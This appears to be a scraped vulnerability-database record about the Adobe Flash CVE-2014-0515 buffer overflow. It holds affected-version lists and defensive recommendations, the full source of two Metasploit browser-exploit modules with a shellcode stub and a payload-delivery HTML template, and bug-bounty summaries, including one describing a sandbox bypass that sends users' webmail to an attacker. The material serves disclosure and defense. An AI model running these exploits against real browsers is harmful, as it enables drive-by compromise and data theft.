\n * Adobe Flash Player 10.1.51.66 \n * Adobe Flash Player 10.1.52.14 \n * Adobe Flash Player 10.1.52.14.1 \n * Adobe Flash Player 10.1.52.15 \n * Adobe Flash Player 10.1.53.64 \n * Adobe Flash Player 10.1.82.76 \n * Adobe Flash Player 10.1.85.3 \n * Adobe Flash Player 10.1.92.10 \n * Adobe Flash Player 10.1.92.8 \n * Adobe Flash Player 10.1.95.1 \n * Adobe Flash Player 10.1.95.2 \n * Adobe Flash Player 10.2.152 \n * Adobe Flash Player 10.2.152.21 \n * Adobe Flash Player 10.2.152.26 \n * Adobe Flash Player 10.2.152.32 \n * Adobe Flash Player 10.2.152.33 \n * Adobe Flash Player 10.2.153.1 \n * Adobe Flash Player 10.2.154.13 \n * Adobe Flash Player 10.2.154.18 \n * Adobe Flash Player 10.2.154.24 \n * Adobe Flash Player 10.2.154.25 \n * Adobe Flash Player 10.2.154.27 \n * Adobe Flash Player 10.2.154.28 \n * Adobe Flash Player 10.2.156.12 \n * Adobe Flash Player 10.2.157.51 \n * Adobe Flash Player 10.2.159.1 \n * Adobe Flash Player 10.3.181.14 \n * Adobe Flash Player 10.3.181.16 \n * Adobe Flash Player 10.3.181.22 \n * Adobe Flash Player 10.3.181.23 \n * Adobe Flash Player 10.3.181.26 \n * Adobe Flash Player 10.3.181.34 \n * Adobe Flash Player 10.3.183.10 \n * Adobe Flash Player 10.3.183.11 \n * Adobe Flash Player 10.3.183.15 \n * Adobe Flash Player 10.3.183.16 \n * Adobe Flash Player 10.3.183.18 \n * Adobe Flash Player 10.3.183.19 \n * Adobe Flash Player 10.3.183.20 \n * Adobe Flash Player 10.3.183.23 \n * Adobe Flash Player 10.3.183.25 \n * Adobe Flash Player 10.3.183.29 \n * Adobe Flash Player 10.3.183.4 \n * Adobe Flash Player 10.3.183.43 \n * Adobe Flash Player 10.3.183.48 \n * Adobe Flash Player 10.3.183.5 \n * Adobe Flash Player 10.3.183.50 \n * Adobe Flash Player 10.3.183.51 \n * Adobe Flash Player 10.3.183.61 \n * Adobe Flash Player 10.3.183.63 \n * Adobe Flash Player 10.3.183.67 \n * Adobe Flash Player 10.3.183.68 \n * Adobe Flash Player 10.3.183.7 \n * Adobe Flash Player 10.3.183.75 \n * Adobe Flash Player 10.3.183.86 \n * Adobe Flash Player 10.3.185.21 \n * Adobe Flash Player 10.3.185.22 \n * Adobe Flash Player 10.3.185.23 \n * Adobe Flash Player 10.3.185.24 \n * Adobe Flash Player 10.3.185.25 \n * Adobe Flash Player 10.3.186.2 \n * Adobe Flash Player 10.3.186.3 \n * Adobe Flash Player 10.3.186.6 \n * Adobe Flash Player 10.3.186.7 \n * Adobe Flash Player 11 \n * Adobe Flash Player 11.0 \n * Adobe Flash Player 11.0.1.129 \n * Adobe Flash Player 11.0.1.152 \n * Adobe Flash Player 11.0.1.152 ~~~~X64~ \n * Adobe Flash Player 11.0.1.153 \n * Adobe Flash Player 11.0.1.60 \n * Adobe Flash Player 11.0.1.98 \n * Adobe Flash Player 11.1 \n * Adobe Flash Player 11.1.102.228 \n * Adobe Flash Player 11.1.102.55 \n * Adobe Flash Player 11.1.102.55 ~~~~X64~ \n * Adobe Flash Player 11.1.102.59 \n * Adobe Flash Player 11.1.102.62 \n * Adobe Flash Player 11.1.102.63 \n * Adobe Flash Player 11.1.111.10 \n * Adobe Flash Player 11.1.111.44 \n * Adobe Flash Player 11.1.111.5 \n * Adobe Flash Player 11.1.111.50 \n * Adobe Flash Player 11.1.111.54 \n * Adobe Flash Player 11.1.111.6 \n * Adobe Flash Player 11.1.111.64 \n * Adobe Flash Player 11.1.111.7 \n * Adobe Flash Player 11.1.111.73 \n * Adobe Flash Player 11.1.111.8 \n * Adobe Flash Player 11.1.111.9 \n * Adobe Flash Player 11.1.112.61 \n * Adobe Flash Player 11.1.115.11 \n * Adobe Flash Player 11.1.115.34 \n * Adobe Flash Player 11.1.115.48 \n * Adobe Flash Player 11.1.115.54 \n * Adobe Flash Player 11.1.115.58 \n * Adobe Flash Player 11.1.115.59 \n * Adobe Flash Player 11.1.115.6 \n * Adobe Flash Player 11.1.115.63 \n * Adobe Flash Player 11.1.115.69 \n * Adobe Flash Player 11.1.115.7 \n * Adobe Flash Player 11.1.115.8 \n * Adobe Flash Player 11.1.115.81 \n * Adobe Flash Player 11.2.202 238 \n * Adobe Flash Player 11.2.202.160 \n * Adobe Flash Player 11.2.202.197 \n * Adobe Flash Player 11.2.202.221 \n * Adobe Flash Player 11.2.202.223 \n * Adobe Flash Player 11.2.202.228 \n * Adobe Flash Player 11.2.202.229 \n * Adobe Flash Player 11.2.202.233 \n * Adobe Flash Player 11.2.202.235 \n * Adobe Flash Player 11.2.202.236 \n * Adobe Flash Player 11.2.202.238 \n * Adobe Flash Player 11.2.202.243 \n * Adobe Flash Player 11.2.202.251 \n * Adobe Flash Player 11.2.202.258 \n * Adobe Flash Player 11.2.202.261 \n * Adobe Flash Player 11.2.202.262 \n * Adobe Flash Player 11.2.202.270 \n * Adobe Flash Player 11.2.202.273 \n * Adobe Flash Player 11.2.202.275 \n * Adobe Flash Player 11.2.202.280 \n * Adobe Flash Player 11.2.202.285 \n * Adobe Flash Player 11.2.202.291 \n * Adobe Flash Player 11.2.202.297 \n * Adobe Flash Player 11.2.202.310 \n * Adobe Flash Player 11.2.202.332 \n * Adobe Flash Player 11.2.202.335 \n * Adobe Flash Player 11.2.202.336 \n * Adobe Flash Player 11.2.202.341 \n * Adobe Flash Player 11.2.202.346 \n * Adobe Flash Player 11.2.202.350 \n * Adobe Flash Player 11.2.202.95 \n * Adobe Flash Player 11.3.300.214 \n * Adobe Flash Player 11.3.300.231 \n * Adobe Flash Player 11.3.300.250 \n * Adobe Flash Player 11.3.300.257 \n * Adobe Flash Player 11.3.300.262 \n * Adobe Flash Player 11.3.300.265 \n * Adobe Flash Player 11.3.300.268 \n * Adobe Flash Player 11.3.300.270 \n * Adobe Flash Player 11.3.300.271 \n * Adobe Flash Player 11.3.300.273 \n * Adobe Flash Player 11.3.31.230 \n * Adobe Flash Player 11.3.378.5 \n * Adobe Flash Player 11.4.400.231 \n * Adobe Flash Player 11.4.402.265 \n * Adobe Flash Player 11.4.402.278 \n * Adobe Flash Player 11.4.402.287 \n * Adobe Flash Player 11.5.500.80 \n * Adobe Flash Player 11.5.502.110 \n * Adobe Flash Player 11.5.502.118 \n * Adobe Flash Player 11.5.502.124 \n * Adobe Flash Player 11.5.502.131 \n * Adobe Flash Player 11.5.502.135 \n * Adobe Flash Player 11.5.502.136 \n * Adobe Flash Player 11.5.502.146 \n * Adobe Flash Player 11.5.502.149 \n * Adobe Flash Player 11.6.602.105 \n * Adobe Flash Player 11.6.602.167 \n * Adobe Flash Player 11.6.602.168 \n * Adobe Flash Player 11.6.602.171 \n * Adobe Flash Player 11.6.602.180 \n * Adobe Flash Player 11.7.700.169 \n * Adobe Flash Player 11.7.700.202 \n * Adobe Flash Player 11.7.700.224 \n * Adobe Flash Player 11.7.700.225 \n * Adobe Flash Player 11.7.700.232 \n * Adobe Flash Player 11.7.700.242 \n * Adobe Flash Player 11.7.700.252 \n * Adobe Flash Player 11.7.700.257 \n * Adobe Flash Player 11.7.700.260 \n * Adobe Flash Player 11.7.700.261 \n * Adobe Flash Player 11.7.700.269 \n * Adobe Flash Player 11.7.700.272 \n * Adobe Flash Player 11.7.700.275 \n * Adobe Flash Player 11.8.800.168 \n * Adobe Flash Player 11.8.800.170 \n * Adobe Flash Player 11.8.800.94 \n * Adobe Flash Player 11.8.800.97 \n * Adobe Flash Player 11.9.900.117 \n * Adobe Flash Player 11.9.900.152 \n * Adobe Flash Player 11.9.900.170 \n * Adobe Flash Player 12 \n * Adobe Flash Player 12.0.0.38 \n * Adobe Flash Player 12.0.0.41 \n * Adobe Flash Player 12.0.0.43 \n * Adobe Flash Player 12.0.0.44 \n * Adobe Flash Player 12.0.0.70 \n * Adobe Flash Player 12.0.0.77 \n * Adobe Flash Player 13.0.0.182 \n * Adobe Flash Player 13.0.0.201 \n * Adobe Flash Player 2 \n * Adobe Flash Player 3 \n * Adobe Flash Player 6 \n * Adobe Flash Player 6.0.21.0 \n * Adobe Flash Player 6.0.79 \n * Adobe Flash Player 7 \n * Adobe Flash Player 7 \n * Adobe Flash Player 7.0.1 \n * Adobe Flash Player 7.0.14.0 \n * Adobe Flash Player 7.0.19.0 \n * Adobe Flash Player 7.0.24.0 \n * Adobe Flash Player 7.0.25 \n * Adobe Flash Player 7.0.53.0 \n * Adobe Flash Player 7.0.60.0 \n * Adobe Flash Player 7.0.61.0 \n * Adobe Flash Player 7.0.63 \n * Adobe Flash Player 7.0.66.0 \n * Adobe Flash Player 7.0.67.0 \n * Adobe Flash Player 7.0.68.0 \n * Adobe Flash Player 7.0.69.0 \n * Adobe Flash Player 7.0.70.0 \n * Adobe Flash Player 7.0.73.0 \n * Adobe Flash Player 7.1 \n * Adobe Flash Player 7.1.1 \n * Adobe Flash Player 7.2 \n * Adobe Flash Player 8 \n * Adobe Flash Player 8.0.22.0 \n * Adobe Flash Player 8.0.24.0 \n * Adobe Flash Player 8.0.33.0 \n * Adobe Flash Player 8.0.34.0 \n * Adobe Flash Player 8.0.35.0 \n * Adobe Flash Player 8.0.39.0 \n * Adobe Flash Player 8.0.42.0 \n * Adobe Flash Player 9 \n * Adobe Flash Player 9.0 \n * Adobe Flash Player 9.0.112.0 \n * Adobe Flash Player 9.0.114.0 \n * Adobe Flash Player 9.0.115.0 \n * Adobe Flash Player 9.0.124.0 \n * Adobe Flash Player 9.0.125.0 \n * Adobe Flash Player 9.0.151 .0 \n * Adobe Flash Player 9.0.152 .0 \n * Adobe Flash Player 9.0.155.0 \n * Adobe Flash Player 9.0.159.0 \n * Adobe Flash Player 9.0.16 \n * Adobe Flash Player 9.0.18D60 \n * Adobe Flash Player 9.0.20 \n * Adobe Flash Player 9.0.20.0 \n * Adobe Flash Player 9.0.246 0 \n * Adobe Flash Player 9.0.246.0 \n * Adobe Flash Player 9.0.260.0 \n * Adobe Flash Player 9.0.262 \n * Adobe Flash Player 9.0.262.0 \n * Adobe Flash Player 9.0.277.0 \n * Adobe Flash Player 9.0.28.0 \n * Adobe Flash Player 9.0.280 \n * Adobe Flash Player 9.0.283.0 \n * Adobe Flash Player 9.0.289.0 \n * Adobe Flash Player 9.0.31.0 \n * Adobe Flash Player 9.0.45.0 \n * Adobe Flash Player 9.0.47.0 \n * Adobe Flash Player 9.0.48.0 \n * Adobe Flash Player 9.0.8.0 \n * Adobe Flash Player 9.0.9.0 \n * Adobe Flash Player 9.125.0 \n * Adobe Flash Player for Mac 11.4.402.287 \n * Adobe Flash Player for Mac 11.5.502.110 \n * Adobe Flash Player for Mac 11.5.502.136 \n * Adobe Flash Player for Mac 11.5.502.146 \n * Adobe Flash Player for Mac 11.5.502.149 \n * Adobe Flash Player for Mac 11.6.602.167 \n * Adobe Flash Player for Mac 11.6.602.180 \n * Adobe Flash Player for Mac 11.7.700.169 \n * Adobe Flash Player for Mac 11.7.700.202 \n * Adobe Flash Player for Mac 11.7.700.225 \n * Adobe Flash Player for Mac 11.7.700.232 \n * Adobe Flash Player for Mac 11.7.700.242 \n * Adobe Flash Player for Mac 11.7.700.252 \n * Adobe Flash Player for Mac 11.8.800 97 \n * Adobe Flash Player for Mac 11.8.800.168 \n * Adobe Flash Player for Mac 11.8.800.94 \n * Adobe Flash Player for Mac 11.9.900.117 \n * Adobe Flash Player for Mac 11.9.900.152 \n * Adobe Flash Player for Mac 11.9.900.170 \n * Adobe Flash Player for Macintosh 11.7.700.269 \n * Adobe Flash Player for Macintosh 11.7.700.272 \n * Adobe Flash Player for Macintosh 11.9.900.170 \n * Adobe Flash Player for Macintosh 12.0.0 77 \n * Adobe Flash Player for Macintosh 12.0.0.38 \n * Adobe Flash Player for Macintosh 12.0.0.41 \n * Adobe Flash Player for Macintosh 12.0.0.44 \n * Adobe Flash Player for Macintosh 12.0.0.70 \n * Adobe Flash Player for Macintosh 13.0.0.182 \n * Adobe Flash Player for Macintosh 13.0.0.201 \n * Gentoo Linux \n * Microsoft Windows 8 for 32-bit Systems \n * Microsoft Windows 8 for 64-bit Systems \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for 64-bit Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows RT \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Redhat Enterprise Linux Desktop Supplementary 5 Client \n * Redhat Enterprise Linux Desktop Supplementary 5 Server \n * Redhat Enterprise Linux Desktop Supplementary 6 \n * Redhat Enterprise Linux Server Supplementary 6 \n * Redhat Enterprise Linux Server Supplementary AUS 6.5 server \n * Redhat Enterprise Linux Server Supplementary EUS 6.5.z \n * Redhat Enterprise Linux Workstation Supplementary 6 \n * SuSE Suse Linux Enterprise Desktop 11 SP3 \n * SuSE openSUSE 11.4 \n * SuSE openSUSE 12.3 \n * SuSE openSUSE 13.1 \n\n### Recommendations\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from a successful exploit. \n\n**Do not accept or execute files from untrusted or unknown sources.** \nTo limit exposure to these and other latent vulnerabilities, never handle files that originate from unfamiliar or untrusted sources.\n\n**Do not follow links provided by unknown or untrusted sources.** \nTo reduce the likelihood of successful exploits, never visit sites of questionable integrity or follow links provided by unfamiliar or untrusted sources.\n\n**Implement multiple redundant layers of security.** \nAs an added precaution, deploy memory-protection schemes (such as nonexecutable stack/heap configuration and randomly mapped memory segments). This may complicate exploits of memory-corruption vulnerabilities.\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, run applications with the minimal amount of privileges required for functionality. \n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "cvss3": {}, "published": "2014-04-28T00:00:00", "type": "symantec", "title": "Adobe Flash Player CVE-2014-0515 Buffer Overflow Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0515"], "modified": "2014-04-28T00:00:00", "id": "SMNTC-67092", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/67092", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-03-19T17:07:31", "description": "This Metasploit module exploits a buffer overflow vulnerability in Adobe Flash Player. The vulnerability occurs in the flash.Display.Shader class, when setting specially crafted data as its bytecode, as exploited in the wild in April 2014. This Metasploit module has been tested successfully on IE 6 to IE 10 with Flash 11 and Flash 12 over Windows XP SP3, Windows 7 SP1 and Windows 8.", "cvss3": {}, "published": "2014-05-09T00:00:00", "type": "zdt", "title": "Adobe Flash Player Shader Buffer Overflow Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0515"], "modified": "2014-05-09T00:00:00", "id": "1337DAY-ID-22232", "href": "https://0day.today/exploit/description/22232", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::BrowserExploitServer\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Adobe Flash Player Shader Buffer Overflow\",\r\n 'Description' => %q{\r\n This module exploits a buffer overflow vulnerability in Adobe Flash Player. The\r\n vulnerability occurs in the flash.Display.Shader class, when setting specially\r\n crafted data as its bytecode, as exploited in the wild in April 2014. This module\r\n has been tested successfully on IE 6 to IE 10 with Flash 11 and Flash 12 over\r\n Windows XP SP3, Windows 7 SP1 and Windows 8.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Unknown', # Vulnerability discovery and exploit in the wild\r\n 'juan vazquez' # msf module\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2014-0515'],\r\n ['BID', '67092'],\r\n ['URL', 'http://helpx.adobe.com/security/products/flash-player/apsb14-13.html'],\r\n ['URL', 'http://www.securelist.com/en/blog/8212/New_Flash_Player_0_day_CVE_2014_0515_used_in_watering_hole_attacks'],\r\n ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/analyzing-cve-2014-0515-the-recent-flash-zero-day/' ]\r\n ],\r\n 'Payload' =>\r\n {\r\n 'Space' => 2000,\r\n 'DisableNops' => true,\r\n 'PrependEncoder' => stack_adjust\r\n },\r\n 'DefaultOptions' =>\r\n {\r\n 'InitialAutoRunScript' => 'migrate -f',\r\n 'Retries' => false,\r\n 'EXITFUNC' => \"thread\"\r\n },\r\n 'Platform' => 'win',\r\n 'BrowserRequirements' =>\r\n {\r\n :source => /script|headers/i,\r\n :clsid => \"{D27CDB6E-AE6D-11cf-96B8-444553540000}\",\r\n :method => \"LoadMovie\",\r\n :os_name => Msf::OperatingSystems::WINDOWS,\r\n :ua_name => Msf::HttpClients::IE,\r\n :flash => lambda { |ver| ver =~ /^11\\./ || ver =~ /^12\\./ || (ver =~ /^13\\./ && ver <= '13.0.0.182') }\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Automatic', {} ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"Apr 28 2014\",\r\n 'DefaultTarget' => 0))\r\n end\r\n\r\n def exploit\r\n @swf = create_swf\r\n super\r\n end\r\n\r\n def stack_adjust\r\n adjust = \"\\x64\\xa1\\x18\\x00\\x00\\x00\" # mov eax, fs:[0x18 # get teb\r\n adjust << \"\\x83\\xC0\\x08\" # add eax, byte 8 # get pointer to stacklimit\r\n adjust << \"\\x8b\\x20\" # mov esp, [eax] # put esp at stacklimit\r\n adjust << \"\\x81\\xC4\\x30\\xF8\\xFF\\xFF\" # add esp, -2000 # plus a little offset\r\n\r\n adjust\r\n end\r\n\r\n def on_request_exploit(cli, request, target_info)\r\n print_status(\"Request: #{request.uri}\")\r\n\r\n if request.uri =~ /\\.swf$/\r\n print_status(\"Sending SWF...\")\r\n send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'})\r\n return\r\n end\r\n\r\n print_status(\"Sending HTML...\")\r\n tag = retrieve_tag(cli, request)\r\n profile = get_profile(tag)\r\n profile[:tried] = false unless profile.nil? # to allow request the swf\r\n send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})\r\n end\r\n\r\n def exploit_template(cli, target_info)\r\n swf_random = \"#{rand_text_alpha(4 + rand(3))}.swf\"\r\n flash_payload = \"\"\r\n get_payload(cli,target_info).unpack(\"V*\").each do |i|\r\n flash_payload << \"0x#{i.to_s(16)},\"\r\n end\r\n flash_payload.gsub!(/,$/, \"\")\r\n\r\n\r\n html_template = %Q|<html>\r\n <body>\r\n <object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" />\r\n <param name=\"movie\" value=\"<%=swf_random%>\" />\r\n <param name=\"allowScriptAccess\" value=\"always\" />\r\n <param name=\"FlashVars\" value=\"sh=<%=flash_payload%>\" />\r\n <param name=\"Play\" value=\"true\" />\r\n </object>\r\n </body>\r\n </html>\r\n |\r\n\r\n return html_template, binding()\r\n end\r\n\r\n def create_swf\r\n path = ::File.join( Msf::Config.data_directory, \"exploits\", \"CVE-2014-0515\", \"Graph.swf\" )\r\n swf = ::File.open(path, 'rb') { |f| swf = f.read }\r\n\r\n swf\r\n end\r\n\r\nend\n\n# 0day.today [2018-03-19] #", "sourceHref": "https://0day.today/exploit/22232", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2023-06-24T18:06:58", "description": "This module exploits a buffer overflow vulnerability in Adobe Flash Player. The vulnerability occurs in the flash.Display.Shader class, when setting specially crafted data as its bytecode, as exploited in the wild in April 2014. This module has been tested successfully on the following operating systems and Flash versions: Windows 7 SP1, IE 8 to IE 11 with Flash 13.0.0.182, Windows 7 SP1, Firefox 38.0.5, Flash 11.7.700.275 and Adobe Flash 13.0.0.182, Windows 8.1, Firefox 38.0.5 and Adobe Flash 13.0.0.182, Linux Mint \"Rebecca\" (32 bit), Firefox 33.0 and Adobe Flash 11.2.202.350\n", "cvss3": {}, "published": "2015-06-11T21:18:50", "type": "metasploit", "title": "Adobe Flash Player Shader Buffer Overflow", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0515"], "modified": "2021-02-25T16:47:49", "id": "MSF:EXPLOIT-MULTI-BROWSER-ADOBE_FLASH_PIXEL_BENDER_BOF-", "href": "https://www.rapid7.com/db/modules/exploit/multi/browser/adobe_flash_pixel_bender_bof/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::BrowserExploitServer\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Adobe Flash Player Shader Buffer Overflow',\n 'Description' => %q{\n This module exploits a buffer overflow vulnerability in Adobe Flash Player. The\n vulnerability occurs in the flash.Display.Shader class, when setting specially\n crafted data as its bytecode, as exploited in the wild in April 2014. This module\n has been tested successfully on the following operating systems and Flash versions:\n\n Windows 7 SP1, IE 8 to IE 11 with Flash 13.0.0.182,\n Windows 7 SP1, Firefox 38.0.5, Flash 11.7.700.275 and Adobe Flash 13.0.0.182,\n Windows 8.1, Firefox 38.0.5 and Adobe Flash 13.0.0.182,\n Linux Mint \"Rebecca\" (32 bit), Firefox 33.0 and Adobe Flash 11.2.202.350\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown', # Vulnerability discovery and exploit in the wild\n 'juan vazquez' # msf module\n ],\n 'References' =>\n [\n ['CVE', '2014-0515'],\n ['BID', '67092'],\n ['URL', 'http://helpx.adobe.com/security/products/flash-player/apsb14-13.html'],\n ['URL', 'http://www.securelist.com/en/blog/8212/New_Flash_Player_0_day_CVE_2014_0515_used_in_watering_hole_attacks'],\n ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/analyzing-cve-2014-0515-the-recent-flash-zero-day/' ]\n ],\n 'Payload' =>\n {\n 'DisableNops' => true\n },\n 'Platform' => ['win', 'linux'],\n 'Arch' => [ARCH_X86],\n 'BrowserRequirements' =>\n {\n :source => /script|headers/i,\n :arch => ARCH_X86,\n :os_name => lambda do |os|\n os =~ OperatingSystems::Match::LINUX ||\n os =~ OperatingSystems::Match::WINDOWS_7 ||\n os =~ OperatingSystems::Match::WINDOWS_81\n end,\n :ua_name => lambda do |ua|\n case target.name\n when 'Windows'\n return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF\n when 'Linux'\n return true if ua == Msf::HttpClients::FF\n end\n\n false\n end,\n :flash => lambda do |ver|\n case target.name\n when 'Windows'\n return true if ver =~ /^11\\./ && Rex::Version.new(ver) <= Rex::Version.new('11.7.700.275')\n return true if ver =~ /^12\\./\n return true if ver =~ /^13\\./ && Rex::Version.new(ver) <= Rex::Version.new('13.0.0.182')\n when 'Linux'\n return true if ver =~ /^11\\./ && Rex::Version.new(ver) <= Rex::Version.new('11.2.202.350')\n end\n\n false\n end\n },\n 'Targets' =>\n [\n [ 'Windows',\n {\n 'Platform' => 'win'\n }\n ],\n [ 'Linux',\n {\n 'Platform' => 'linux'\n }\n ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => '2014-04-28',\n 'DefaultTarget' => 0))\n end\n\n def exploit\n @swf = create_swf\n super\n end\n\n def on_request_exploit(cli, request, target_info)\n print_status(\"Request: #{request.uri}\")\n\n if request.uri =~ /\\.swf$/\n print_status('Sending SWF...')\n send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})\n return\n end\n\n print_status('Sending HTML...')\n send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})\n end\n\n def exploit_template(cli, target_info)\n swf_random = \"#{rand_text_alpha(4 + rand(3))}.swf\"\n target_payload = get_payload(cli, target_info)\n b64_payload = Rex::Text.encode_base64(target_payload)\n os_name = target_info[:os_name]\n\n if target.name =~ /Windows/\n platform_id = 'win'\n elsif target.name =~ /Linux/\n platform_id = 'linux'\n end\n\n html_template = %Q|<html>\n <body>\n <object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" />\n <param name=\"movie\" value=\"<%=swf_random%>\" />\n <param name=\"allowScriptAccess\" value=\"always\" />\n <param name=\"FlashVars\" value=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" />\n <param name=\"Play\" value=\"true\" />\n <embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" Play=\"true\"/>\n </object>\n </body>\n </html>\n |\n\n return html_template, binding()\n end\n\n def create_swf\n path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2014-0515', 'msf.swf' )\n swf = ::File.open(path, 'rb') { |f| swf = f.read }\n\n swf\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/browser/adobe_flash_pixel_bender_bof.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "hackerone": [{"lastseen": "2023-09-04T00:48:02", "bounty": 0.0, "description": "The proof of concept attached will exploit the implementation of flash in some browsers that will bypass the local-with-fileaccess sandbox. By encoding in ignored file:// uri characters, and navigating to another page with a decoder script. one is able to read arbitrary files AND parse it to the parent page, bypassing the local sandbox. \r\nThe flash applet has a default mode in which it will parse file content and another mode (by setting flashvars) that will parse the length of the content of a file. And iframe within those 2 makes sure that the original window is persistent and the applet in the iframe will only move the iframe, the data is then passed by localstorage, and if recieved by poc.html, the iframe is reset.\r\nA quick overview of what the poc is doing, in which order.\r\n-Determine the length of the content from the file through the flash applet with mode 2\r\n-Determine the maximum amount of space which can be used for leaking the data (chrome uses a max of 260)\r\n-Since every character uses 8 bits, divide that amount by 8, set as maximum chars in one 'transmission'.\r\n-Determine how much 'transmissions are needed' to get the entire file\r\n-Walk through file to get the entire file by appending all requested parts to variable 'total'\r\n-Call whatever callback function back.\r\n\r\n\r\nDemonstrated in poc2.html:\r\n-The impact of this attack is increased by the ability to download arbitrary remote files (Cross origin) by systematically downloading those files to a know predictable location. (using the download= attribute in a <a >tag). This link will be automatically clicked. Now as long as the user is opening the file from a Drive:/User/Username location. We can simply predict the path to read the downloaded file on windows vista+ (Or any other OS with a default download folder for that matter).\r\n-This stage of exploitation enables an attacker to access a file with the auth of the user the following 'attack use cases' arise:\r\n1. Attacker could access and send users web-mail to his sown erver. (try using 'https://mail.google.com/mail/u/0/feed/atom' in poc2 while logged in with gmail)\r\n2. Attacker could get XSRF-tokens. To bypass such protections.\r\nI could imagine there are countless other possibilities. \r\n-You might notice that loading the Hackerone page is painfully slow. However, In targeted attacks a attacker could filter the desirable data in the flash applet itself.\r\n\r\n\r\n\r\nNow for the exploit itself, I acknowledge that the exploit might look very complex.\r\nWhich is why I added a 'frontend' that is tested under the following conditions.\r\nOS:Windows 8\r\nBrowser: Google Chrome 32.0.1700.107 m", "cvss3": {}, "published": "2014-02-21T01:47:59", "type": "hackerone", "title": "Internet Bug Bounty: Flash local-with-fileaccess Sandbox Bypass", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0508"], "modified": "2014-04-17T00:41:53", "id": "H1:2140", "href": "https://hackerone.com/reports/2140", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-09-04T00:49:56", "bounty": 2000.0, "description": "*This bug was reported directly to Adobe.*\n\nhttp://helpx.adobe.com/security/products/flash-player/apsb14-08.html\n", "cvss3": {}, "published": "2014-03-11T00:00:00", "type": "hackerone", "title": "Internet Bug Bounty: Same Origin Security Bypass Vulnerability", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0503"], "modified": "2014-03-11T00:00:00", "id": "H1:6380", "href": "https://hackerone.com/reports/6380", "cvss": {"score": 6.4, "vector": 